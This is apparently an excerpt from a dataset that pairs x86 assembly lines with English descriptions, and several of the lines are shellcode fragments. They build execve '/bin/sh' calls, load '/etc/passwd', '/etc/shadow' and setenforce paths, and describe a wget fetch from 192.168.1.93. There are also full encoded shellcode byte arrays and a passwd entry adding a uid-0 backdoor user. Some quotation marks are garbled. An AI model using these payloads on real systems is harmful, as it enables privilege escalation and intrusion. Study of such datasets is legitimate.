+ push ebx push the string Ô////bin/bashÕ on tsack
4507
  push ebx push the pointer to /bin/bash
4508
  push ebx push ptr addr on stack
4509
  push ebx push pointer
 
4573
  push ecx \n mov edx,esp push ecx on the stack and then place pointer to edx
4574
  push ecx \n pop edi load ecx contents into edi register
4575
  push ecx \n push 0x2 \n push 0x2 push ecx content, the value 0x2 two times on stack
4576
+ push ecx \n push 0x64777373 \n push 0x61702f2f \n push 0x6374652f \n mov ecx,esp load Ô/etc//passwdÕ and null teminating string into ecx register
4577
+ push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load Ô/bin//sh\0Õ on ebx register
4578
  push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp push the string /bin//sh\0\0\0\0\0\0\0\0 on the stack and place pointer to eb
4579
+ push ecx \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push ecx cotent, ÔhsabÕ, Ô/nibÕ and Ô////Õ on stack
4580
+ push ecx \n push 0x7461632f \n push 0x6e69622f \n mov ebx,esp load Ô/bin/catÕ and null teminating string into ebx register
4581
  push ecx \n push 0x8 \n push edx \n push esi \n mov ecx, esp load ecx content, hexadecimal value 0x8, edx content, esi content into ecx register
4582
+ push ecx \n push 0xb \n pop eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load __nr_execve syscall into eax register and the string Ô/bin//sh\0Õ into ebx register
4583
+ push ecx \n push dword 0x68732f2f \n push dword 0x6e69622f \n mov ebx, esp load Ô/bin//sh\0Õ into ebx register
4584
  push ecx \n push eax push the pointer to sockaddr and the fd received previously on stack
4585
  push ecx \n push ebx push ecx and ebx content on stack
4586
  push ecx \n push ebx \n mov ecx,esp load the string /usr/bin/wget 192.168.1.93//x </dev/null2<&1 in ecx register
4587
+ push ecx \n push ebx \n pop ebx save null terminating string Ô/bin/shÕ into ebx
4588
  push ecx \n push ebx \n push dword 0x2 \n mov ecx, esp push ecx and ebx contents and 32 bit equal to 2 on the stack and then put esp in ecx
4589
  push ecx \n push ecx \n push esi push the value 0 to the stack for 2 times and then push esi
4590
  push ecx \n push esi push ecx and esi contents on the stack
 
4596
  push edi push edi content on the stack
4597
  push edi "push ""c-"" on stack"
4598
  push edi push edi content
4599
+ push edi push Ô-cÕ value on stack
4600
  push edi push the edi onto the stack
4601
  push edi push edi to the stack
4602
  push edi push the contents of the edi register onto the stack
 
4645
  push edx push the value of register edx onto the stack
4646
  push edx push edx onto the stack
4647
  push edx push edx on the stack
4648
+ push edx \n mov eax, 0xb33fb33f \n sub eax, 0x3bd04ede \n push eax push null terminated string ÔadowÕ on stack
4649
  push edx \n mov eax, esp push the contents of the edx register onto the stack and point eax to the stack register
4650
  push edx \n mov ebx, esp push the contents of the edx register onto the stack and point ebx to the stack register
4651
  push edx \n mov ecx, esp push the contents of the edx register onto the stack and point ecx to the stack register
4652
+ push edx \n push 0x6563726f \n push 0x666e6574 \n push 0x65732f6e \n push 0x6962732f \n push 0x7273752f push null termination string and the string Ô/usr/sbin/setenforceÕ on the stack
4653
  push edx \n push 0x68732f2f \n push 0x6e69622f push null terminated /bin//sh on stack
4654
  push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp push /bin//sh +\x00 on the stack and then point ebx where that string is located
4655
+ push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load null bytes, Ô//shÕ and Ô/binÕ into ebx register
4656
+ push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load Ô/bin//sh\0Õ into ebx register
4657
  push edx \n push 0x68735858 push edx and the hexadecimal value 0x68735858 on the stack
4658
  push edx \n push byte 0x30 push edx and the value 0x30 onto the stack
4659
  push edx \n push byte 0x77 \n push word 0x6f64 \n mov esi, 0x222933f0 \n add esi, 0x3f3f3f3f \n push esi \n xor esi, esi \n mov esi, 0x243525f0 \n add esi, 0x3f3f3f3f \n push esi \n xor esi, esi \n mov ebx, esp load the string /cte/shadow on ebx register
 
4712
  push esi \n mov ecx, esp push the contents of the esi register onto the stack and point ecx to the stack register
4713
  push esi \n mov edi, esi push the stack onto esi and move the contents on edi
4714
  push esi \n mov edx, esp push the contents of the esi register onto the stack and point edx to the stack register
4715
+ push esi \n push 0x68732f2f \n push 0x6e69622f push null terminated string Ô/bin//shÕ on stack
4716
  push esi \n push edi push /bin//sh in stack
4717
  push esi \n push edi push esi and edi content on stack
4718
  push esi \n push edi \n push edx push esi, edi and edx content on stack
 
4742
  push word [edx] push the word [edx] onto the stack
4743
  push word [edx] push the word [edx] to the stack
4744
  push word 0544o push the word 0544o onto the stack
4745
+ push word 0544o \n pop ecx allow permissions r-xr--rÑsave them into ecx
4746
  push word 0644o push the word 0644o onto the stack
4747
  push word 0666q set read-write permission
4748
  push word 0666q push the word 0666q onto the stack
 
4784
  push word 0x3930 push the word 0x3930 onto the stack
4785
  push word 0x401f push the word 0x401f onto the stack
4786
  push word 0x4255 push the word 0x4255 onto the stack
4787
+ push word 0x462d push Ô-fÕ on stack
4788
  push word 0x462d push the word 0x462d to the stack
4789
  push word 0x462d push the word 0x462d onto the stack
4790
  push word 0x5000 push 0x5000 onto stack port
 
4806
  push word 0x5c11 push the word 0x5c11 to the stack
4807
  push word 0x632d push -c param on the stack
4808
  push word 0x632d push the word paramenter -c on the stack
4809
+ push word 0x632d push the parameter Òc-Ò as a word on stack
4810
+ push word 0x632d push the value Ô-cÕ on stack
4811
  push word 0x632d push the word 0x632d onto the stack
4812
  push word 0x632d push the word 0x632d to the stack
4813
  push word 0x632d \n mov eax, esp push the word 0x632d onto the stack and point the eax register to the stack register
 
5021
  shellcode: define shellcode label
5022
  shellcode: declare the shellcode label
5023
  shellcode: db 'vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash' define the array of bytes shellcode and initialize it to vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash
5024
+ "shellcode: db ""vl43ck:$6$bxwjfzor$muhuwo0mugdkwfppeydqgzpm.ytpmi/gam4lvqhp21lfnwmsj821kvjniyoodytbh.sf9ar7ciqbrccw5bgjx0:0:0:vl43ck:/tmp:/bin/bashÓ" "define the shellcode: ""vl43ck:$6$bxwjfzor$muhuwo0mugdkwfppeydqgzpm.ytpmi/gam4lvqhp21lfnwmsj821kvjniyoodytbh.sf9ar7ciqbrccw5bgjx0:0:0:vl43ck:/tmp:/bin/bashÓ"
5025
  shellcode: db 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88 define shellcode as the array of bytes 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88
5026
  shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 define shellcode as array of bytes 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
5027
  shellcode: db 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4 shellcode contains the bytes 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4
 
5208
  sub dx, bx subtract bx from dx
5209
  sub eax, [esp] subtract the value of the memory at address esp from eax and store into eax
5210
  sub eax, 0x013ffeff subtract 0x013ffeff from the contents in eax and save the result in eax
5211
+ sub eax, 0x013ffeff \n push eax push Ô in/ on stack
5212
  sub eax, 0x04feca01 subtract 0x04feca01 from the contents in eax and save the result in eax
5213
+ sub eax, 0x04feca01 \n inc eax \n push eax push Ô/etcÕ on stack
5214
  sub eax, 0x0efc3532 subtract 0x0efc3532 from the contents in eax and save the result in eax
5215
+ sub eax, 0x0efc3532 \n push eax push Ô//shÕ on stack
5216
  sub eax, 0x10 subtract 0x10 from eax
5217
  sub eax, 0x2c3d2dff subtract 0x2c3d2dff from the contents in eax and save the result in eax
5218
  sub eax, 0x2c3d2dff \n push eax push 0777 on stack
5219
  sub eax, 0x3217d6d2 subtract 0x3217d6d2 from the contents in eax and save the result in eax
5220
+ sub eax, 0x3217d6d2 \n add eax, 0x31179798 \n push eax push Ô///bÕ on stack
5221
  sub eax, 0x3bd04ede subtract 0x3bd04ede from the contents in eax and save the result in eax
5222
  sub eax, 0x70445eaf subtract 0x70445eaf from the contents in eax and save the result in eax
5223
  sub eax, 216 subtract 216 from the value stored in eax
 
5243
  sub ebx,ebx \n xor ecx,ecx zero out ebx and ecx content
5244
  sub ecx, 0x03030303 subtract 3.3.3.3 from ip address
5245
  sub ecx, 0x04baca01 subtract 0x04baca01 from the contents in ecx and save the result in ecx
5246
+ sub ecx, 0x04baca01 \n inc ecx \n push ecx push Ô/etcÕ on stack
5247
  sub ecx, 0x0b454440 subtract 0x0b454440 from the contents in ecx and save the result in ecx
5248
+ sub ecx, 0x0b454440 \n push ecx push Ô///hÕ on stack
5249
  sub ecx, 0x1525152a subtract 0x1525152a from the contents in ecx and save the result in ecx
5250
  sub ecx, 0x6374612e subtract hexadecimal value 0x6374612e to ecx content
5251
  sub ecx, 0x6374612e subtract 0x6374612e from the contents in ecx and save the result in ecx
 
5390
  word_table dw 134, 345, 564, 123 declare the array of words word_table initialized to 134 345 564 and 123
5391
  word_value dw 300 define the word value word_value and initialize it to 300
5392
  word1 word 65535 define word1 unsigned word and initialize it to 65535
5393
+ word2 sword Ð32768 define word2 signed word and initialize it to -32768
5394
  word3 word ? define word3 uninitialized unsigned word
5395
  wordvar: resw 1 reserve a word for wordvar
5396
  wrap_around: define _wrap_around label